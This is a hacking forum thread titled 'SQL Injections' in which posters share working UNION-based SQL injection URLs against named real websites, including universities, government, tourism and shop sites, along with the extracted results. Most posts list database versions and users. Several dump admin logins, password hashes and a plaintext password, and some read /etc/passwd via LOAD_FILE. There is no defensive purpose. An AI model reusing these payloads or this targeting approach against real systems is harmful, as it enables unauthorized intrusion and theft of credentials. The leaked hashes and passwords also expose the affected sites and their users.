SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. yarbabin

    Code:
    http://www.musicer.net/Live%20is%20life.php?sms_kod=-60546'/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    6.0.2-alpha-log
    heh heh
     
  2. f1ng3r

    Code:
    http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--

    Database Version : 4.1.21-standard
    Database name : sagu_news
    User name : [email protected]


    Grabbing the admin:

    Code:
    http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11+from+mysql.user--
     
  3. AkyHa_MaTaTa

    www.russiatourism.ru PageRank: 6 TCI: 1800
    HTML:
    http://www.russiatourism.ru/?actionType=getCities&D=-1)+union+select+DISTINCT+concat(table_schema,'.',table_name,'=%3E',COLUMN_NAME,'%3Cbr%3E')+from+INFORMATION_SCHEMA.COLUMNS+--+
    
    I never did find the admin panel; maybe there isn't one.

    wap.biz.mts.com.ua

    HTML:
    http://wap.biz.mts.com.ua/tr/rss-feeder?from=/4&pid=1&nid=-38189'+union+select+1,2,3,concat_ws(0x3A,user(),@@version,database()),5,6,7,8+--+
    
    rescue01.gov.by
    HTML:
    http://rescue01.gov.by/news/show.news.cgi?id=-435+union+select+1,2,3,concat_ws(0x3A,user(),database(),version()),5/*
    
    The admin panel is behind basic auth :( .
     
    #7743 AkyHa_MaTaTa, 13 Feb 2009
    Last edited: 13 Feb 2009
  4. spherics


    Database Version: 5.0.67-community
    Database name: circlem_db
    User name: circlem_webuser@localhost

    /home/circlem/public_html/manager/obj/database/mysql.php


    : 3 : root : 4c60d3c4867b2f1e6935165b4b68130e24276876 : a : 1 : {s:4:"root";b:1;}





    Database Version: 5.0.67-log
    Database name: janera
    User name: [email protected]



     
    #7744 spherics, 13 Feb 2009
    Last edited: 13 Feb 2009
  5. yarbabin

    Code:
    http://www.macbytes.com/mb.php?catdispid=-12+union+select+1,2,3,version(),5,6,7,8,9/*
    5.0.22-log
     
  6. M.W.N.N.

    http://www.innernet.org.il/printArticle.php?id=-197+union+select+1,2,3,4,5,6,version()/*

    version() 4.0.16-log
    database() innernet
    user() innerdb@zeraim
     
  7. M.W.N.N.

    http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

    4.1.21-standard
    engel_website
    engel_website@localhost

    http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(id,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+engel_users
     
  8. spherics

    PageRank = 7

    Database Version: 5.0.38-Ubuntu_0ubuntu1-log
    Database name: sjudb
    User name: [email protected]



    PageRank = 5

    4.1.22-standard
    dsmayer_dsmayer@localhost
    dsmayer_contemporaryposters


    4.1.20-log
    huntLeaseDefault@localhost
    huntlease



    5.0.67-community
    scientif@localhost
    botany2007
     
  9. kevmen

    version:5


    user:[email protected]

    database:drougru
     
  10. Parserian

    Code:
    http://www.savatouristik.ru/index.php?id=-1%20UNION%20SELECT%201,%20concat_ws(char(58),%20user(),%20version(),%20database())%20--
    client304@localhost:4.0.27:savatour
     
  11. pinky07

    datasvyazi.ru Quality hosting =)))

    user - superaza_data@localhost
    db - superaza_data
    MySQL version - 5.0.44-log

    Apparently the admin login is superaza, and the MD5 hash of the password is: a1314764bfdb8b9683dcf378520912a4
     
  12. Parserian

    Code:
    http://www.i4b.ru/link2.php?id=1%20union%20select%20group_concat(concat_ws(char(58),%20id,pass,nick)%20SEPARATOR%200x3C62723E)%20from%20smerus_users%20limit%201
    
     
    #7752 Parserian, 14 Feb 2009
    Last edited: 14 Feb 2009
  13. f1ng3r

    Code:
    http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
    Database Version : 5.0.51a-log
    Database name : openbg_mambo1
    User name : ropenbg_mambo1@localhost


    Grabbing the admins:

    Code:
    http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat_ws(0x3a,flogin,fpass),4,5,6+from+atuser--
    they are all output at once ))

    and here is the admin panel itself:

    Code:
    http://www.open-bg.net/adm/index.php

    -------------------------# add

    Code:
    http://ypetev.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
    Database Version : 5.0.67-community-log
    Database name : ypetevc_1
    User name : ypetevc_1@localhost
     
    #7753 f1ng3r, 14 Feb 2009
    Last edited: 14 Feb 2009
  14. Kraneg

    uchri.org - PR7
    Code:
    http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),73),73),4,5,6,7/*
    DB_Ver : 4.1.13-log
    DB_User : root@localhost
    DB : uchri_website

    Let's dump the users; luckily they are all output at once =)
    Code:
    http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),73),73),4,5,6,7+from+mysql.user/*
    root:*3E9CBCAC089CD40647357E4F6468CF7A8FCDC6C5
    bahacal:*EF6AE544D8B7CC6B225A461C0EB6C8E72DF68ED1
    mario:*C0110649C935092BAB4CC0D1897ED4A4680CD3FA
    uchri_user:*D639800883740738B468A3FE6FF4D34EE25FD15E

    Reading the file /etc/passwd:
    Code:
    http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(LOAD_FILE(0x2f6574632f706173737764),73),73),4,5,6,7/*
     
  15. Gorev

    http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8/*


    Database Version: 4.1.22
    Database name: consensus
    User name: root@localhost


    Read File

    http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+UNION+SELECT+1,2,3,LOAD_FILE(0x2F6574632F706173737764),5,6,7,8/*
     
  16. Kraneg

    haas.stanford.edu - PR6
    Code:
    http://haas.stanford.edu/external_fellowships/definition.php?cat_id=10000'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4/*
    
    DB_Ver : 4.1.22
    DB_User : haas@localhost
    DB : haas
     
  17. -m0rgan-

    www.acd.edu
    PR:4
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,user,password),4,5+from+mysql.user/*
    login/pass:
    Code:
    root:45b3d67e3384ad28
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+from+mysql.user/*
    version/user/db:

    Code:
    4.1.22:root@localhost:InternalKnowledgeBase
    Checking file_priv:
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,file_priv,4,5+from+mysql.user/*
    Y

    It reads etc/passwd
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,load_file('/etc/passwd'),4,5+from+mysql.user/*
  18. Dimionx

    www.rune-soft.com

    PR = 4


    Code:
    http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(login,0x3a,password,0x3a,email),20,21,22,23+from+user+limit+2,1/*
    login:password:email
    admin:tagltorp:[email protected]



    Code:
    http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(version(),0x3a,database(),0x3a,user()),20,21,22,23/*
    version:db:user

    5.0.32-Debian_7etch8:runeDB:runeDBuser@localhost
     
  19. Велемир

    http://cms.artmedia.ee/arinou/index.php?leht=149'+union+select+version(),2/*

    Version: 4.1.22-standard
    DB name: wartmed_walmivad
    User: wartmed_wartmed@localhost

    Couldn't guess the tables)

    http://www.tartu.ee/arinouandla/index.php?leht=219'+union+select+version(),2

    Version five.

    There's nothing interesting in the DB; you can check the tables yourselves:

    kasutajad,kasutajad_back,kasutajad_190607,umail
     
  20. f1ng3r

    Code:
    http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10--
    Database Version : 5.0.32-Debian_7etch4-log
    Database name : vraca
    User name : [email protected]


    Grabbing the users:

    Code:
    http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10+from+phpbb_users+limit+1,1--
    there are ~1700 of them
     